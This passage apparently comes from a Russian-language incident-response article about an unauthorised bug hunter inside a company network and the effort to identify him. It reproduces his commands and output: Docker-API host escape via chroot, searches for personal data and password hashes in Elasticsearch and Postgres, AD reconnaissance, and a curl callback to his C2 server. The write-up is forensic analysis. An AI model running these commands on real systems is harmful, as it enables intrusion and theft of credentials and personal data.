\u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0430. \u0412\u0441\u0435 \u044d\u0442\u0438 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043e\u043d \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0447\u0435\u0440\u0435\u0437 python-\u0441\u043a\u0440\u0438\u043f\u0442\u044b, \u0437\u0430\u0432\u0435\u0440\u043d\u0443\u0442\u044b\u0435 \u0432 Base64:<\/p>\n<p><code>$ docker run --rm --net=host python:3.11-alpine sh -c \"echo aW1wb3J0IHVybGxpYi5yZXF1ZXN0LCBqc29uLCBzc2wKY3R4ID0gc3NsLmNyZWF0ZV9kZWZhdWx0X2NvbnRleH[masked]<\/code><\/p>\n<p><code>=== CREATE TEST INDEX ===<\/code><\/p>\n<p><code>CREATE: {\"acknowledged\":true,\"shards_acknowledged\":true,\"index\":\"bb-bughunter-test-index\"}<\/code><\/p>\n<p><code>=== WRITE TEST DOC ===<\/code><\/p>\n<p><code>WRITE: {\"_index\":\"bb-bughunter-test-index\",\"_id\":\"1\",\"_version\":1,\"result\":\"created\",\"_shards\":{\"total\":1,\"successful\":1,\"failed\":0},\"_seq_no\":0,\"_primary_term\":1}<\/code><\/p>\n<p><code>=== READ BACK ===<\/code><\/p>\n<p><code>READ: {\"_index\":\"bb-bughunter-test-index\",\"_id\":\"1\",\"_version\":1,\"_seq_no\":0,\"_primary_term\":1,\"found\":true,\"_source\":{\"message\": \"X-BugBounty: Bughunter - proof of write access\", \"timestamp\": \"2026-05-21\"}}<\/code><\/p>\n<p><code>=== DELETE TEST INDEX ===<\/code><\/p>\n<p><code>DELETE: {\"acknowledged\":true}<\/code><\/p>\n<p>\u0415\u0449\u0435 \u043e\u043d \u043f\u0440\u043e\u0431\u0443\u0435\u0442 \u0432\u044b\u0442\u0430\u0449\u0438\u0442\u044c \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 (email, \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u044b, \u043f\u0430\u0441\u043f\u043e\u0440\u0442\u0430, \u0430\u0434\u0440\u0435\u0441\u0430, \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b \u0438 \u043f\u0440\u043e\u0447\u0435\u0435) \u0438\u0437 \u0438\u043d\u0434\u0435\u043a\u0441\u043e\u0432 Elasticsearch:<\/p>\n<p><code>=== PASSPORT\/SNILS\/ADDRESS: 10000 hits ===<\/code><\/p>\n<p><code>\u00a0 [cmw_test-prod_system_event_adapter]<\/code><\/p>\n<p><code>\u00a0 {\"id\": \"08de8a99-6bce-2e9a-9255-000000011303\", \"previous_event\": \"08de8a99-6bce-2e9a-9255-000000011302\", \"origin_event\": \"08de8a99-6bce-2e9a-0000-000000000000\", \"initiator\": {\"abbreviation\": \"[masked]\", \"type\": \"Account\", \"id\": \"account.3690\", \"name\": \"[masked]\", \"alias\": \"[masked]\"}, \"type\": \"AdapterRequestSent\", \"status\": \"Success\", \"solution\": {\"type\": \"Solution\", \"id\": \"system\", \"name\": \"system\"}, \"container\": {\"type\": \"Adapter\", \"id\": \"adapter\", \"name\": \"adapter\"}, \"adapter_data\": {\"plugin\": {\"type\": \"Adapter\", \"id\": \"adapter.2\", \"nam<\/code><\/p>\n<p><code>\u00a0=== \u0424\u0410\u041c\u0418\u041b\u0418\u042f OR \u0424\u0418\u041e OR SURNAME: 10000 hits ===<\/code><\/p>\n<p><code>\u00a0 [masked]<\/code><\/p>\n<p><code>=== \u0414\u0410\u0422\u0410 \u0420\u041e\u0416\u0414\u0415\u041d\u0418\u042f OR BIRTHDAY OR BIRTHDATE: 10000 hits ===<\/code><\/p>\n<p><code>\u00a0 [masked]<\/code><\/p>\n<p><code>=== \u0417\u0410\u0420\u041f\u041b\u0410\u0422\u0410 OR SALARY OR \u041e\u041a\u041b\u0410\u0414: 43 hits ===<\/code><\/p>\n<p><code>\u00a0 [masked]<\/code><\/p>\n<p>\u0411\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u043d\u0430 \u0445\u043e\u0441\u0442 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432. \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u043a Docker API \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043d\u043e\u0432\u044b\u0439 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440 \u0441 host mount, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u0442\u0441\u044f \u0434\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0445\u043e\u0441\u0442\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e chroot:<\/p>\n<p><code>$ echo \"X-BugBounty Bughunter - DOCKER RCE\"<\/code><\/p>\n<p><code>$ docker run --rm --net=host python:3.11-alpine sh -c \"echo aW1wb3J0IHVybGxpYi5yZXF1ZXN0LCBqc29uCgpBUEkgPSAiaHR0cDovLz[masked]| base64 -d &gt; \/tmp\/<\/code><a href=\"http:\/\/s.py\"><code>s.py<\/code><\/a><code> &amp;&amp; python3 \/tmp\/<\/code><a href=\"http:\/\/s.py\"><code>s.py<\/code><\/a><code>\"<\/code><\/p>\n<p><code>=== RUNNING CONTAINERS ===<\/code><\/p>\n<p><code>\u00a0 76314479fc85 ['\/pushgateway'] prom\/pushgateway running<\/code><\/p>\n<p><code>\u00a0 5ca3556e205b ['\/grafana-container'] grafana\/grafana running<\/code><\/p>\n<p><code>\u00a0 5c46d78fb40c ['\/prometheus'] prom\/prometheus running<\/code><\/p>\n<p><code>\u00a0 d04022e41e54 ['\/portainer'] portainer\/portainer running<\/code><\/p>\n<p><code>=== EXEC IN \/pushgateway (76314479fc85) ===<\/code><\/p>\n<p><code>Exec ID: ba5bebe6b7b4a31ebff74cef6f899e91c335c2c181e7e3f5442def7b0866a02d<\/code><\/p>\n<p><code>OUTPUT:<\/code><\/p>\n<p><code>$uid=65534(nobody) gid=65534(nobody)<\/code><\/p>\n<p><code>=== CREATE CONTAINER WITH HOST MOUNT ===<\/code><\/p>\n<p><code>Created: eaf154407262<\/code><\/p>\n<p><code>$ docker -H tcp:\/\/10.50.100.90:2375 run --rm --pid=host --privileged --net=host -v \/:\/host alpine chroot \/host sh -c \"hostname &amp;&amp; id &amp;&amp; whoami &amp;&amp; cat \/etc\/os-release | head -3 &amp;&amp; echo --- &amp;&amp; uname -a &amp;&amp; echo --- &amp;&amp; ls \/home\/\"<\/code><\/p>\n<p>\u0410 \u043f\u043e\u0442\u043e\u043c \u043e\u043d \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a PostgreSQL (\u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438) \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435:<\/p>\n<p><code>$ docker -H tcp:\/\/10.50.100.90:2375 run --rm --privileged --net=host --pid=host -v \/:\/host alpine chroot \/host sh -c \"su postgres -c 'psql -c \\\"SELECT version();\\\"' &amp;&amp; su postgres -c 'psql -c \\\"\\\\l\\\"' &amp;&amp; su postgres -c 'psql -c \\\"SELECT datname, pg_size_pretty(pg_database_size(datname)) as size FROM pg_database ORDER BY pg_database_size(datname) DESC;\\\"'\"<\/code><\/p>\n<p><code>$ docker -H tcp:\/\/10.50.100.90:2375 run --rm --privileged --net=host --pid=host -v \/:\/host alpine chroot \/host su postgres -c \"psql -d erp_profil -c \\\"SELECT column_name FROM information_schema.columns WHERE table_name='_reference219' AND table_schema='public' ORDER BY ordinal_position LIMIT 30;\\\"\"<\/code><\/p>\n<p><code>$ echo \"=== SEARCH FOR FIO\/PHONE COLUMNS ===\"<\/code><\/p>\n<p><code>$ docker -H tcp:\/\/10.50.100.90:2375 run --rm --privileged --net=host --pid=host -v \/:\/host alpine chroot \/host su postgres -c \"psql -d erp_profil -c \\\"SELECT table_name, column_name FROM information_schema.columns WHERE table_schema='public' AND (column_name ILIKE '%fio%' OR column_name ILIKE '%phone%' OR column_name ILIKE '%email%' OR column_name ILIKE '%name%' OR column_name ILIKE '%passport%' OR column_name ILIKE '%snils%' OR column_name ILIKE '%inn%' OR column_name ILIKE '%address%') LIMIT 30;\\\"\"<\/code><\/p>\n<p><code>$ docker -H tcp:\/\/10.50.100.90:2375 run --rm --privileged --net=host --pid=host -v \/:\/host alpine chroot \/host su postgres -c \"psql -d grafana_db -c 'SELECT login, email, password, salt, is_admin FROM \\\"user\\\";'\"<\/code><\/p>\n<p>\u0415\u0449\u0435 \u0432 \u0438\u0441\u0442\u043e\u0440\u0438\u0438 .psql_history \u043d\u0430\u0445\u043e\u0434\u0438\u0442 \u043f\u0430\u0440\u043e\u043b\u044c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435:<\/p>\n<p><code>$ docker -H tcp:\/\/10.50.100.90:2375 run --rm -v \/:\/host alpine cat \/host\/root\/.psql_history || true<\/code><\/p>\n<p><code>lisr list user ls<\/code><\/p>\n<p><code>\\du<\/code><\/p>\n<p><code>alter user postgres with password '[masked]' exit \/q \/quit \/exit<\/code><\/p>\n<p>\u0422\u0430\u043a\u0436\u0435 \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442 AD \u0447\u0435\u0440\u0435\u0437 impacket, \u0438\u0449\u0435\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430, \u0446\u0435\u043d\u0442\u0440\u044b \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a \u0447\u0435\u0440\u0435\u0437 SMB:<\/p>\n<p><code>$ docker run --rm --net=host python:3.11-alpine sh -c \"apk add -q --no-cache bind-tools 2&gt;\/dev\/null &amp;&amp; pip install -q impacket 2&gt;\/dev\/null &amp;&amp; echo aW1wb3J0IHNvY2tldCwgc3RydWN0LCBvcwoKREMgPSAiMTAuOT[masked]| base64 -d &gt; \/tmp\/s.py &amp;&amp; python3 \/tmp\/s.py\"<\/code><\/p>\n<p><code>=== ADCS DISCOVERY ===<\/code><\/p>\n<p><code>=== PRINTERBUG CHECK ===<\/code><\/p>\n<p><code>\u00a0 10.50.100.6:445 OPEN (SMB for SpoolSS)<\/code><\/p>\n<p><code>=== SPOOLSS PIPE CHECK ===<\/code><\/p>\n<p><code>\u00a0 10.50.100.6 spoolss: access denied (needs creds)<\/code><\/p>\n<p><code>=== SCAN FOR ADCS WEB ENROLLMENT ===<\/code><\/p>\n<p><code>!!! ADCS WEB 10.50.100.34: 200<\/code><\/p>\n<p>\u0412 \u0446\u0435\u043b\u043e\u043c \u0442\u0430\u043c \u0435\u0441\u0442\u044c \u0435\u0449\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u0430\u0442\u0430\u043a, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0434\u044b\u0440\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u0432\u044b \u0432\u0441\u0442\u0440\u0435\u0442\u0438\u043b\u0438 \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u00ab\u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438\u00bb?). \u041d\u043e \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u0435\u043c \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u043d\u0430 \u044d\u0442\u043e\u043c \u0438 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043a \u0432\u043e\u043b\u043d\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u0441\u0435\u0445 \u0432\u043e\u043f\u0440\u043e\u0441\u0443.<\/p>\n<h3>\u0422\u0430\u043a \u043e\u0442\u043a\u0443\u0434\u0430 \u0432\u0437\u044f\u043b\u0441\u044f ssh-\u043a\u043b\u044e\u0447?<\/h3>\n<p>\u041a\u0430\u043a \u043c\u044b \u043f\u043e\u043c\u043d\u0438\u043c, \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u043d\u0430\u0447\u0430\u043b \u0441\u0432\u043e\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0441 ssh-\u043a\u043b\u044e\u0447\u043e\u043c \u0412\u0430\u0441\u0438 \u041f\u0443\u043f\u043a\u0438\u043d\u0430 (pupkin). \u0418\u0437 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u2014 \u043e\u043d \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c\u0441\u044f \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0443\u0437\u043b\u044b \u0441 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u043c ssh-\u043a\u043b\u044e\u0447\u043e\u043c:<\/p>\n<p><code>$ echo \"=== COPY PUPKIN SSH KEY AND TRY INTERNAL HOSTS ===\"<\/code><\/p>\n<p>\u0422\u0430\u043a \u043a\u0430\u043a \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0439 \u043a\u043b\u044e\u0447 \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u043d\u0430 \u0441\u0442\u043e\u0440\u043e\u043d\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u0430 \u0438 \u043d\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442\u0441\u044f \u043f\u043e \u0441\u0435\u0442\u0438 (\u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0437\u0434\u0440\u0430\u0432\u043e\u043c\u044b\u0441\u043b\u0438\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f), \u0442\u043e \u043d\u0430\u0448\u0430 \u0440\u0430\u0431\u043e\u0447\u0430\u044f \u0433\u0438\u043f\u043e\u0442\u0435\u0437\u0430 \u2014 \u0443\u0442\u0435\u0447\u043a\u0430 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u0442\u0438\u043b\u0435\u0440\u0430 \u043d\u0430 \u0410\u0420\u041c \u0412\u0430\u0441\u0438.<\/p>\n<p>\u041c\u044b \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u044b \u043d\u0430 \u0435\u0433\u043e \u0443\u0437\u043b\u0435 \u0438 \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u043e\u0432 \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u0442\u0438\u043b\u0435\u0440\u0430, \u043a\u0430\u043a \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u043b\u0435\u0434\u043e\u0432 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438. \u0411\u044b\u043b\u043e \u043c\u043d\u043e\u0433\u043e \u0418\u0418-\u0430\u0433\u0435\u043d\u0442\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u0437\u044b\u0432\u0430\u043b\u0438 \u043f\u043e\u0434\u043e\u0437\u0440\u0435\u043d\u0438\u044f, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0433\u043e. \u0422\u0430\u043a\u0436\u0435 \u043c\u044b \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u043b\u0438 \u043d\u0430\u0448 \u0441\u0435\u0440\u0432\u0438\u0441 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0434\u043b\u044f \u043f\u043e\u0438\u0441\u043a\u0430 \u0443\u0442\u0435\u043a\u0448\u0435\u0433\u043e ssh-\u043a\u043b\u044e\u0447\u0430. \u041a\u043b\u044e\u0447 \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438.<\/p>\n<p>\u041d\u0430\u0447\u0430\u043b\u0438 \u0437\u0430\u043a\u0440\u0430\u0434\u044b\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u043e\u043c\u043d\u0435\u043d\u0438\u044f, \u0447\u0442\u043e \u044d\u0442\u043e \u0441\u0442\u0438\u043b\u0435\u0440. \u0421\u043e\u043c\u043d\u0435\u043d\u0438\u044f \u0443\u043a\u0440\u0435\u043f\u0438\u043b\u0438\u0441\u044c \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043b\u043e\u0433\u0438 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 gitlab. \u0417\u0430 \u043d\u0435\u0434\u0435\u043b\u044e \u0434\u043e \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u043b \u0441\u043a\u0430\u043d \u0432\u0435\u0431\u0430 gitlab \u0438 ssh-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0443\u0447\u0435\u0442\u043e\u043a \u043d\u0430 \u0445\u043e\u0441\u0442\u0435 (\u0438 pupkin \u043d\u0435 \u0432\u0445\u043e\u0434\u0438\u043b \u0432 \u0438\u0445 \u0447\u0438\u0441\u043b\u043e). \u041a\u0430\u043a \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f: \u043c\u043e\u0436\u043d\u043e, \u0430 \u0437\u0430\u0447\u0435\u043c? \u0415\u0441\u043b\u0438 \u0435\u0441\u0442\u044c \u043a\u043b\u044e\u0447, \u0431\u0435\u0440\u0438 \u0434\u0430 \u0437\u0430\u0445\u043e\u0434\u0438 \u0441 \u043d\u0438\u043c. \u0421\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u043d\u0430 \u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u043a\u043b\u044e\u0447\u0430 \u0435\u0449\u0435 \u043d\u0435 \u0431\u044b\u043b\u043e. \u0418 \u043e\u043d \u0441\u043c\u043e\u0433 \u043d\u0430\u0439\u0442\u0438 \u0435\u0433\u043e \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e, \u0430 \u043d\u0430\u0448\u0430 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u2014 \u043d\u0435\u0442?<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/426\/df3\/391\/426df3391e58056f491f54e5d5e42d32.png\" width=\"593\" height=\"366\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/426\/df3\/391\/426df3391e58056f491f54e5d5e42d32.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/426\/df3\/391\/426df3391e58056f491f54e5d5e42d32.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0422\u0430\u043a \u043a\u0430\u043a \u043d\u0430\u0439\u0442\u0438 \u0443\u0442\u0435\u0447\u043a\u0443 \u043d\u0435 \u0443\u0434\u0430\u0432\u0430\u043b\u043e\u0441\u044c, \u043c\u044b \u0440\u0435\u0448\u0438\u043b\u0438 \u043f\u043e\u0434\u043e\u0439\u0442\u0438 \u0447\u0443\u0442\u044c-\u0447\u0443\u0442\u044c \u0441 \u0434\u0440\u0443\u0433\u043e\u0439 \u0441\u0442\u043e\u0440\u043e\u043d\u044b \u0438 \u043d\u0430\u0439\u0442\u0438 \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440\u0430\u2026<\/p>\n<h3>\u041a\u0442\u043e \u0442\u044b, \u0432\u043e\u0438\u043d?<\/h3>\n<p>\u041f\u0440\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u043a\u043e\u043c\u043c\u0438\u0442\u043e\u0432 \u043c\u044b \u0432\u0438\u0434\u0435\u043b\u0438, \u0447\u0442\u043e \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440 \u0434\u0435\u043b\u0430\u0435\u0442 \u043e\u0442\u0441\u0442\u0443\u043a \u043d\u0430 \u0441\u0432\u043e\u0439 \u04212-\u0441\u0435\u0440\u0432\u0435\u0440:<\/p>\n<p><code>curl -s -m 10 -X POST \"http:\/\/100.100.100.100:1337\/ci-callback\"<\/code><\/p>\n<p>\u0412 \u0446\u0435\u043b\u043e\u043c \u0441 \u044d\u0442\u043e\u0433\u043e \u0436\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u043b\u0430\u0441\u044c \u0432\u0441\u044f \u0435\u0433\u043e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 ssh-\u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f.<\/p>\n<p>\u041d\u0430 \u044d\u0442\u043e\u043c \u0430\u0434\u0440\u0435\u0441\u0435 \u0440\u0435\u0437\u043e\u043b\u0432\u0438\u0442\u0441\u044f \u0434\u043e\u043c\u0435\u043d [masked].domain.su. \u041f\u0440\u0438 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0435 \u043d\u0430 <em>http:\/\/100.100.100.100:1337\/ci-callback<\/em> \u0438\u043b\u0438 <em>http:\/\/ [masked].domain.su:1337\/ci-callback<\/em> \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u043b\u0430\u0441\u044c \u0441\u0442\u0440\u043e\u043a\u0430:<\/p>\n<p><code>{\"status\": \"ok\", \"ts\": \"timestamp UTC\"}<\/code><\/p>\n<p>\u0410 \u043f\u0440\u0438 \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u0438 \u043d\u0430 \u0432\u0435\u0431 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u043b\u0430\u0441\u044c \u0444\u043e\u0440\u043c\u0430 \u0432\u0445\u043e\u0434\u0430:<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9fe\/0d5\/3e8\/9fe0d53e8171f08f511a08fe9681a71d.png\" width=\"531\" height=\"395\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/9fe\/0d5\/3e8\/9fe0d53e8171f08f511a08fe9681a71d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9fe\/0d5\/3e8\/9fe0d53e8171f08f511a08fe9681a71d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u0447\u0435\u043c\u0443 \u0432\u0430\u0436\u043d\u043e, \u0447\u0442\u043e \u0434\u043e\u043c\u0435\u043d \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u043e \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0441 \u0431\u0430\u0433\u0445\u0430\u043d\u0442\u0435\u0440\u043e\u043c-\u043d\u0435\u043b\u0435\u0433\u0430\u043b\u043e\u043c? \u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0430\u0434\u0440\u0435\u0441 100.100.100.100 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0438\u0442 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u043c\u0443 \u0432\u0435\u0431-\u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0443 \u0438 \u043d\u0430 \u043d\u0435\u043c \u0440\u0435\u0437\u043e\u043b\u0432\u0438\u0442\u0441\u044f \u0435\u0449\u0435 \u043e\u0434\u0438\u043d \u0434\u043e\u043c\u0435\u043d VPN-\u0441\u0435\u0440\u0432\u0438\u0441\u0430. \u041d\u0430\u043c \u043d\u0430\u0434\u043e \u0431\u044b\u043b\u043e \u0437\u043d\u0430\u0442\u044c \u043d\u0430\u0432\u0435\u0440\u043d\u044f\u043a\u0430.<\/p>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u0438\u0437\u0443\u0447\u0430\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0434\u043e\u043c\u0435\u043d\u0435 \u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 \u0442\u043e\u0433\u043e, \u043d\u0430 \u043a\u043e\u0433\u043e \u043e\u043d \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d:<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fd8\/170\/43c\/fd817043c44cb10bc3f06c66c436f976.png\" width=\"805\" height=\"736\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/fd8\/170\/43c\/fd817043c44cb10bc3f06c66c436f976.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fd8\/170\/43c\/fd817043c44cb10bc3f06c66c436f976.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0427\u0443\u0434\u0435\u0441\u0430, \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043b\u0438\u0447\u043d\u0443\u044e \u043f\u043e\u0447\u0442\u0443 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u043d\u0442\u0430.<\/p>\n<p>\u0410 \u0447\u0442\u043e \u0435\u0441\u043b\u0438 \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u0433\u0443\u0433\u043b\u0438\u0442\u044c \u0441\u043e\u0447\u0435\u0442\u0430\u043d\u0438\u0435 BugBounty \u0438 \u043d\u0438\u043a\u043d\u0435\u0439\u043c Bughunter? \u0422\u043e\u0433\u0434\u0430 \u043c\u044b \u043d\u0430\u0439\u0434\u0435\u043c \u043f\u0440\u043e\u0444\u0438\u043b\u044c \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430 \u043d\u0430 Standoff \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u0442\u0438\u043f\u0430 \u0442\u0430\u043a\u043e\u0439 <a href=\"https:\/\/standoff365.com\/ru-RU\/profile\/*Bughunter*\/\"><em>https:\/\/standoff365.com\/ru-RU\/profile\/*Bughunter*\/<\/em><\/a>.<\/p>\n<p>PS \u041e \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e \u043d\u0438\u043a\u043d\u0435\u0439\u043c, \u043c\u044b \u0443\u0437\u043d\u0430\u043b\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, 